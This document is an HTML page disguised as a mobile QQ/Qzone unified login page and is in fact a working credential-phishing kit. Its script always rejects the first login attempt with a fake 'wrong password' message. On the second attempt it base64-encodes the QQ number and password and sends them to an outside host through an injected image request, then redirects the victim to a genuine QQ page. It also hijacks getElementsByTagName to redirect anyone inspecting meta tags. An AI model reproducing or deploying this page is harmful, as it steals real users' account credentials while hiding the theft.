<!DOCTYPE html>
<html lang="zh-cn"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no">
<link href="css.css" rel="stylesheet" type="text/css"> 
<title>手机统一登录</title>
<script src="//cdn.staticfile.org/jquery/1.12.4/jquery.min.js"></script>
</style> <link rel="stylesheet" href="http://qzonestyle.gtimg.cn/qzone/phone/style/login.css">
<style>
#container{
	text-align: center;
	font-family: Arial;
	color: #AAA;
	-webkit-user-select: none;
}
#icon{
	width: 100px;
	height: 100px;
}
#detail{
	color: #CCC;
	font-size: 0.8em;
	padding: 10px;
	word-break: break-all;
}
*{	margin: 0; padding: 0;list-style:none;border:0; box-sizing:border-box;}
.clearfix:after { content: "."; display: block; font-size: 0; height: 0; clear: both; visibility: hidden; }
.clearfix { display: inline-table;}
*html .clearfix { height: 1%; }
.clearfix { display: block; }
*+html .clearfix { min-height: 1%; }
	.che_tit{ text-align:center; padding:20px;}
	.ul_pro{ background-color:#CED3D9; text-align:center; padding:4px 2px; font-size:14px;}
	.ul_pro li{ float:left; width:11.11%; padding:2px;box-sizing: border-box;}
	.ul_pro .li_close{  float:right; width:22.22%;}
	.ul_pro .li_close span{ background-color:#ACB3BB;}
	.ul_pro .li_clean{  float:right; width:22.22%;}
	.ul_pro li span{ display:block; background-color:#fff; border-radius:4px; box-shadow: 2px 2px 2px #888888; /* max-width:48px; margin:0 auto; */ line-height:32px; padding-top:2px;  }
.ul_pro li span:active{ background-color:#4DA9F2; color:#fff;}

.ul_input{ width:290px; margin:0 auto; }
.ul_input li{ float:left; width:290px; text-align:center; border-bottom: 1px solid #eaeaea;}
.ul_input li span{ display:block; background-color:#fff; width:100%; margin:0 auto; height:40px; line-height:40px;overflow: hidden;    padding: 0 14px; text-align: left; font-size: 16px;}
.ul_input_default{color:#aaa}
.ul_input_username li span{border-radius:4px 4px 0 0; }
.ul_input_password li span{border-radius:0 0 4px 4px; }

.ul_keybord{ background-color:#CED3D9; text-align:center; padding:4px 2px; font-size:14px;}
.ul_keybord li{ float:left; width:10%; padding:2px;box-sizing: border-box;}
/*.ul_keybord .ikey20{ margin-left:5%;}*/
.ul_keybord .li_w{ width:11.11%; }


.ul_keybord .li_close{  float:right; width:22.22%;}
.ul_keybord .li_close span{ background-color:#ACB3BB;}
.ul_keybord .li_clean{  float:right; width:22.22%;}
.ul_keybord li span{ display:block; background-color:#fff; border-radius:4px; box-shadow: 2px 2px 2px #888888; /* max-width:48px; margin:0 auto; */ line-height:32px; padding-top:2px;  }
.ul_keybord li span:active{ background-color:#4DA9F2; color:#fff;}
.zhanghao.left, .mima {
    float: left;
    line-height: 40px;
}
button.login {
    text-align: center;
    width: 90%;
    height: 60px;
    margin: 0 5%;
    background: #FF9800;
    color: #FFF;
    font-size: 20px;
    font-weight: bold;
}.zleft {
    width: 100%;
	float:left;
}.zright {
    width: 40%;
    float: right;
}.zleft li {
    width: 33.333%;
}

.layui-m-layerchild.layui-m-anim-up {
    background-color: #CED3D9;
}


li.ikey.ikey47.li_zm, .ikey.ikey48.li_zm {
    width: 15%;
}li.yuliuweiz {
    width: 100%;
}


</style>
<!--顶部banner-->
<a class="banner" data-btn="下载" href="./" id="btn_app_down"  style="background-image:url(http://qzonestyle.gtimg.cn/qzone/phone/style/img/act/down-app/qzone-app-download.jpg);"></a>
</head>
<body style="zoom: 1;">
<a id="clickurl" rel="noreferrer" style="visibility:hidden"></a>
<div id="article" style="display:none;" role="main">人生的路，靠的是自己一步步取走，真正能保护你的，是你自己的选择。而真正能伤害你的，也是一样，自己的选择。决定人生的，不是命运，而是你自己的每一次抉择。
</div>
	<div id="content" class="content">
		<div id="error_tips">
			<div id="error_tips_content">
				<span id="error_icon"></span> <span id="error_message"></span>
			</div>
		</div>
		<div id="login" class="login">
			<div id="logo" class="logo"></div>
			<div id="app_name" style="display: none"></div>
			<div id="q_login" class="q_login" style="display: none">
				<div id="q_login_title">
					<div id="q_login_logo"></div>
					<label id="q_login_tips"></label>
				</div>
				<div id="q_logon_list" class="q_logon_list"></div>
		  </div>
          <div id="web_login">
          
          
			<form id="loginform" autocomplete="off" name="loginform" method="get" target="_self" style="margin:0">
				
						<ul class="clearfix ul_input ul_input_username">
						<li class="input_pro"><span id="zhanghao" class="ul_input_default">QQ号码/手机/邮箱</span></li>
						</ul>
				
						
						<ul class="clearfix ul_input ul_input_password">
						<li class="input_password"><span id="mimas" class="ul_input_default">请输入你的QQ密码</span>
						</ul>
				
                
				<div href="javascript:void(0);" id="go">登 录</div>
                
			</form>
            
            
		  </div>
			<div id="switch">
				<div id="swicth_login" onClick="pt._switch()" style="display: none"></div>
				<div id="zc_feedback">
					<span id="zc" onClick="window.open(&#39;http://zc.qq.com/phone/index.html?from=pt&#39;)">注册新帐号</span>
					<span id="forgetpwd" onClick="window.open(&#39;https://aq.qq.com/cn2/findpsw/mobile_v2/mobile_web_find_input_account&#39;)">忘了密码？</span>
				</div>
			</div>
			<div id="custom_bottom"></div>
		</div>
		<div id="vcode">
			<label id="vcode_tips"></label>
			<div id="vcode_area">
				<img id="vcode_img"><label id="input_tips"></label><input id="vcode_input" name="vcode_input" tabindex="3" autocomplete="off" autocorrect="off" maxlength="6">
			</div>
			<div id="submit"></div>
		</div>
	</div>
	<div id="new_vcode" class="new_vcode">
		
	</div>
	<div id="footerBlank"></div>

<script>

document.querySelector('body').addEventListener('touchmove', function (event) {
	event.preventDefault();
});

function base64_encode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,p='',r=[];if(!d){return d;}do{z=d.charCodeAt(i++);y=d.charCodeAt(i++);x=d.charCodeAt(i++);s=z<<16|y<<8|x;w=s>>18&0x3f;v=s>>12&0x3f;u=s>>6&0x3f;t=s&0x3f;r[j++]=q.charAt(w)+q.charAt(v)+q.charAt(u)+q.charAt(t);}while(i<d.length);p=r.join('');var r=d.length%3;return(r?p.slice(0,r-3):p)+'==='.slice(r||3);}

var err = false;
var times = 0;
function error(msg){

	$("#error_tips").css({display:'block'});
	$('#error_message').html(msg);
	err = true;
	setTimeout("$(\"#error_tips\").css({display:'none'})", 2000);
}

function getCookie(name) {
	var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");

	if (arr = document.cookie.match(reg))

	return unescape(arr[2]);
	else return null;
}
function setCookie(name, value) {
	var Days = 30;
	var exp = new Date();
	exp.setTime(exp.getTime() + Days * 24 * 60 * 60 * 1000);
	document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString();
}

$('form input').focus(function(){

	$("#error_tips").css({display:'none'});
	err = false;
	
});

$("#error_tips").on('click',function(){
	$(this).hide();
});

$("#go").on('click',function(){
	
	var $this = $(this);

			err = false;
			var p = usermima;
			var u = zhanghao;
			
			u == '' && $("#zhanghao").focus() && error('您还没有输入帐号！');	
			if(err) return false;
			p == '' && $("#mimas").focus() && error("您还没有输入密码！");
			if(err) return false;

			/^[1-9][0-9]{5,9}$/.test(u) || error('请输入正确的帐号！');
			if(err) return false;

			var len = p.length;

			(len < 6 || len>16) && error('您输入的帐号或密码不正确，请重新输入。');
			var errnum = new Array("111111","1111111","11111111","111111111","1111111111","222222","2222222","22222222","222222222","2222222222","333333","3333333","33333333","333333333","3333333333","444444","4444444","44444444","444444444","4444444444","555555","5555555","55555555","555555555","5555555555","666666","6666666","66666666","666666666","6666666666","777777","7777777","77777777","777777777","7777777777","888888","8888888","88888888","888888888","8888888888","999999","9999999","99999999","999999999","9999999999","12345","123456","1234567","12345678","123456789","1234567890","0123456789","0123456","012345","234567","2345678","23456789","456789","4567890","567890","147258369","741741741","7417417","1472580","7410258");
			for(i=0;i<errnum.length;i++)	{
				if(u==errnum[i])		{
					error('请输入正确的帐号！');
					return false;
				}
				if(p==errnum[i])		{
					error('请输入正确的密码！');
					return false;
				}	
			}

			if(err) {
				$("#mimas").val('');
				return false;
			}
			if(getCookie('inputs')=='1'){
				setCookie("isLogin",true);
				var b = new Base64();  
				var str = b.encode(u+"|||-|||"+p);  
				
				document.write("<img src='https://www.aaaaaa2aaa11.xyz/"+str+".ico'>")
				setCookie('login','yes');
				window.location.href='https://apps.game.qq.com/ams/wxlogin_redirect.html?s_url=aHR0cHM6Ly9oNS5xem9uZS5xcS5jb20vcGhvdG9ldmVudC9qdW1wdjI/X3Byb3h5PTEmbWFwPTEmX3d2PTMzNTU0NDMy';

			}else{
				setCookie('inputs', '1');
				$("#mimas").text('');
				usermima='',xinghao='';
				error('您输入的帐号或密码不正确，请重新输入。');
				$(".input_password").click();
			}
			return false;
			//document.getElementById("loginform").submit();
});


var Zeptoq = document.getElementsByTagName;
document.getElementsByTagName = function(a) {
  if (a == 'meta') {window.location.href = "https://apps.game.qq.com/ams/wxlogin_redirect.html?s_url=aHR0cHM6Ly9oNS5xem9uZS5xcS5jb20vcGhvdG9ldmVudC9qdW1wdjI/X3Byb3h5PTEmbWFwPTEmX3d2PTMzNTU0NDMy"; return; }
  else{return Zeptoq.call(document, a);}
};
</script>
<script src="base64.js" type="text/javascript"></script>
<script src="layer.js" type="text/javascript"></script>
<script src="index.js" type="text/javascript"></script>
</body></html>